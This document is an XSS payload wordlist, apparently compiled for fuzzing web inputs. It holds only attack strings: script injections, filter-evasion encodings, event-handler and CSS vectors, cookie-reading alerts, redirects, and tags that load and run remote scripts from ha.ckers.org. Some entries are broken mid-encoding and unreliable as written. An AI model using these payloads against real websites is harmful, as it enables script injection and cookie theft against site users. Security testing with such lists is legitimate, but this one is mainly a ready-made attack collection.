Wordlist XSS-2
Wordlist XSS-2
Wordlist XSS-2
");alert('xss');
<h1>XSS DETECTED by HR</h1> .html
<script>alert('XSS')</script>
<sCRiPt>alert('XSS')</ScRIpT>
<0x736372697074>alert('XSS')</0x736372697074>
<char(115,99,114,105,112,116)>alert('XSS')</char(115,99,114,105,112,116)>
<0x736372697074>alert(String.fromCharCode(88, 83, 83))</0x736372697074>
<char(115,99,114,105,112,116)>alert(String.fromCharCode(88, 83,
83))</char(115,99,114,105,112,116)>
<script>alert(String.fromCharCode(88, 83, 83))</script>
"><h1>XSS DETECTED by HR</h1> .html
"><script>alert('XSS')</script>
"><sCRiPt>alert('XSS')</ScRIpT>
"><0x736372697074>alert('XSS')</0x736372697074>
"><char(115,99,114,105,112,116)>alert('XSS')</char(115,99,114,105,112,116)>
"><0x736372697074>alert(String.fromCharCode(88, 83, 83))</0x736372697074>
"><char(115,99,114,105,112,116)>alert(String.fromCharCode(88, 83,
83))</char(115,99,114,105,112,116)>
"><script>alert(String.fromCharCode(88, 83, 83))</script>
%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F
%73%63%72%69%70%74%3E
"><script>aler
;t('XSS')</scr
9;pt>
"><script>alert('X&#
83S')</script>
Ij48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pg==
<script>var myVar = XSS; alert(myVar)</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88, 83, 83,
32, 98, 121, 32, 72, 82))//";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32,
72, 82))//\";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72,
82))</SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
\";alert('XSS');//
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<img src=x onerror=alert(XSS);>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<BODY BACKGROUND="javascript:alert('XSS')">
<onmouseover="javascript:alert('XSS')">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<DIV STYLE="width: expression(alert('XSS'));">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<BASE HREF="javascript:alert('XSS');//">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=javascript:ale
rt('XSS')>
<IMG
SRC=javascri
12t:alert('
XSS')>
<IMG
SRC=javascript:aler
4('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<script>alert(document.cookie)</script>
%3Cscript%3alert(document.cookie);%3C%2Fscript%3
<script>document.location='http://google.com';</script>
<script>document.location='http://google.com'; ',5000</script>
<SCRIPT SRC=http://google.com></SCRIPT>
<SCRIPT/XSS SRC="http://google.com"></SCRIPT>
<body onLoad="document.location.href='http://google.com'">
<meta http-equiv="accion" content="10"; url="http://google.com" />
<frameset rows="100%"><frame noresize="noresize" frameborder ="0" title="XSS Found
by HR" src="http://google.com"></frame></frameset>
<script>window.open( "http://www.google.com/" )</script>
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
SRC=
<IMG
6;avascript:aler&#
116;('XSS')>
<IMG
SRC=javascri
12t:alert('
XSS')>
<IMG
SRC=javascript:aler
4('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<IMG SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:alert('XSS')></OBJECT>
getURL("javascript:alert('XSS')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<!
[CDATA[cript:alert('XSS');">
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
'=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>